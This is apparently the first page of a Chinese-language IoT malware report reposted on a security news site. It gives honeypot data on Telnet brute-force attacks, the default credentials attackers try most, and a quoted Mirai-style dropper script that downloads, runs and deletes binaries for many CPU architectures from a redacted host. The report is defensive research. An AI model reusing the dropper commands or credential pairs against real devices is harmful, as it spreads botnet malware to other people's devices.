欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

IoT恶意软件报告

来源:本站整理 作者:佚名 时间:2019-11-07 TAG: 我要投稿

自2008年以来,网络犯罪分子一直在制造恶意软件,以攻击诸如路由器和其他类型的网络IoT设备。 这些物联网/嵌入式设备的主要问题在于,它们根本无法安装任何类型的安全软件。 我们该如何处理?
跟踪攻击,捕获恶意软件并获得详细数据的最佳选择是使用蜜罐。
数据结果
到目前为止,研究人员已经在蜜罐环境中收集了超过一年的数据。 我们在全球范围内部署了50多个蜜罐, 以下是根据汇总数据得出的结果。
Telnet
在2019年上半年,我们的Telnet蜜罐共检测到超过1.05亿次攻击,这些攻击源自276,000个IP地址。 相比之下,2018年检测到的1200万起攻击(源于69000个IP地址),攻击者IP地址的重复攻击数量呈上升趋势。
巴西和中国在IP地址方面一直处于领先地位,这些IP地址在2019年上半年成为Telnet密码暴力破解的源头,但与2018年相比,中国以30%居于领先地位 ,巴西以19%排名第二。 埃及,俄罗斯和美国分别排名第三,第四和第五。

前十位恶意软件大多数位置都被各种Mirai所占据:


接下来的统计信息是从一组特定的蜜罐中收集的,这些蜜罐没有受到基础结构更改的影响(未添加新设备),因此统计信息仅依赖于受感染设备的活动。 会话代表成功的密码暴力破解尝试。

对来自一组孤立蜜罐的日志的分析表明,攻击者IP地址同比呈稳定趋势,但攻击数量却呈上升趋势。 处于活动状态的受感染设备数量仍然很高:成千上万的设备试图通过暴力破解密码和利用各种漏洞来传播恶意软件。

Credentials
在IoT领域Telnet,SSH和Web服务器是最常见的可用服务,因此也是攻击最多的服务。对于Telnet和SSH,不仅存储恶意负载,而且还存储初始登录凭据。
收集了2018年第三季度和第四季度以及2019年第一季度至第三季度使用最广泛的用户名和密码组合(见附录)。到目前为止,最常见的组合是“ support / support”,其次是“ admin / admin”,“ default / default”和“ root / vizxv”。

恶意软件
普通计算机通常在Intel或AMD CPU(低端x86或x86_64)上运行,而嵌入式IoT设备则使用由多家供应商提供的更广泛的CPU体系结构。
下表列出了收集的所有样本:

攻击者一旦访问设备,便使用一种普遍方法将其恶意软件部署到所有体系结构中。 这种方法之所以有效,是因为只有一个二进制文件可以正确执行。以下是此类脚本的示例:
#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/mips; chmod +x mips; ./mips; rm -rf mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/mipsel; chmod +x mipsel; ./mipsel; rm -rf mipsel
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/sh4; chmod +x sh4; ./sh4; rm -rf sh4
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/x86; chmod +x x86; ./x86; rm -rf x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/armv7l; chmod +x armv7l; ./armv7l; rm -rf armv7l
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/armv6l; chmod +x armv6l; ./armv6l; rm -rf armv6l
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/i686; chmod +x i686; ./i686; rm -rf i686
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/powerpc; chmod +x powerpc; ./powerpc; rm -rf powerpc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/i586; chmod +x i586; ./i586; rm -rf i586
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/m68k; chmod +x m68k; ./m68k; rm -rf m68k
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/sparc; chmod +x sparc; ./sparc; rm -rf sparc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/armv4l; chmod +x armv4l; ./armv4l; rm -rf armv4l
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/armv5l; chmod +x armv5l; ./armv5l; rm -rf armv5l
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/powerpc-440fp; chmod +x powerpc-440fp; ./powerpc-440fp; rm -rf powerpc-440fp

[1] [2]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载